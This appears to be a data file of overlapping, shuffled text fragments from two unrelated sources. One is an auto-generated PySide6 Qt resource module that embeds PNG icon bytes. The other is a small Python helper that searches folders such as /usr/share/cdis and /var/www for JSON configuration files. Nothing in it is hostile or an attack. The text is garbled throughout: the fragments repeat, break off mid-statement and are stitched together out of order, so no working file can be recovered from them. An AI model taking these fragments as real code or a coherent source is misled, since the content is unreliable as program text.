"F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\",
"\\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\",
"\\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\",
"ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\",
"\\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\",
"\\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\",
"\\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\",
"\\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe",
",X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\",
"\\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\",
"code # Created by: The Resource Compiler for Qt version 6.2.2 # WARNING!",
"PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\",
"\\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\",
"\\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\",
"d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\",
"qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\",
"WARNING! All changes made in this file will be lost! from PySide6 import",
"PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\",
"\\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\",
"will be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\",
"PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\",
"\\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\",
"\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\",
"# Resource object code (Python 3) # Created by: object code # Created"
] |
[
"if file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files:",
"easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list",
"def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the loaded json",
"] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the loaded",
"the given folders for file_name search_folders defaults to default_search_folders if not specified return",
"''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name",
"finding file_name in search_folders return the loaded json data or None if file",
"] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults to",
"this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to",
"loaded json data or None if file not found ''' actual_files = find_paths(file_name,",
"of folders to search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME,",
"os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the",
"find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults to default_search_folders if",
"os.path.join(folder, file_name) for folder in search_folders ] return [ path for path in",
"= find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r') as",
"to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of",
"folders to search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name),",
"app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the",
"Return the list of folders to search for configuration files ''' return [",
"return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ]",
"] return [ path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None):",
"in search_folders ] return [ path for path in possible_files if os.path.exists(path) ]",
"not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None",
"search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' %",
"find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r') as reader:",
"''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder",
"after finding file_name in search_folders return the loaded json data or None if",
"% app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders",
"return the loaded json data or None if file not found ''' actual_files",
"return the first path to file_name found ''' search_folders = search_folders or default_search_folders(app_name)",
"app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r') as reader: return",
"path to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [",
"path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after",
"the list of folders to search for configuration files ''' return [ '%s/cdis/%s'",
"in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in",
"configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s'",
"defaults to default_search_folders if not specified return the first path to file_name found",
"possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders",
"make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return",
"search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in",
"search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders ]",
"[ os.path.join(folder, file_name) for folder in search_folders ] return [ path for path",
"default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders ] return [",
"''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0],",
"json data or None if file not found ''' actual_files = find_paths(file_name, app_name,",
"app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for",
"or None if file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if",
"not specified return the first path to file_name found ''' search_folders = search_folders",
"in search_folders return the loaded json data or None if file not found",
"search_folders defaults to default_search_folders if not specified return the first path to file_name",
"''' json.load(file_name) after finding file_name in search_folders return the loaded json data or",
"specified return the first path to file_name found ''' search_folders = search_folders or",
"def default_search_folders(app_name): ''' Return the list of folders to search for configuration files",
"found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None with",
"% app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders",
"# make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): '''",
"json.load(file_name) after finding file_name in search_folders return the loaded json data or None",
"[ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def",
"% (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): '''",
"'/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given",
"the first path to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files",
"file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return",
"list of folders to search for configuration files ''' return [ '%s/cdis/%s' %",
"load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the loaded json data",
"default_search_folders(app_name): ''' Return the list of folders to search for configuration files '''",
"for folder in search_folders ] return [ path for path in possible_files if",
"def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults to default_search_folders",
"json import os # make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/')",
"search_folders) if not actual_files: return None with open(actual_files[0], 'r') as reader: return json.load(reader)",
"[ path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name)",
"found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for",
"for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to search",
"if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return",
"''' Search the given folders for file_name search_folders defaults to default_search_folders if not",
"None if file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not",
"the loaded json data or None if file not found ''' actual_files =",
"possible_files = [ os.path.join(folder, file_name) for folder in search_folders ] return [ path",
"first path to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files =",
"= [ os.path.join(folder, file_name) for folder in search_folders ] return [ path for",
"for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding",
"file_name in search_folders return the loaded json data or None if file not",
"'/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name",
"folders for file_name search_folders defaults to default_search_folders if not specified return the first",
"search_folders ] return [ path for path in possible_files if os.path.exists(path) ] def",
"for file_name search_folders defaults to default_search_folders if not specified return the first path",
"path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name",
"or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders ] return",
"files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' %",
"import os # make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def",
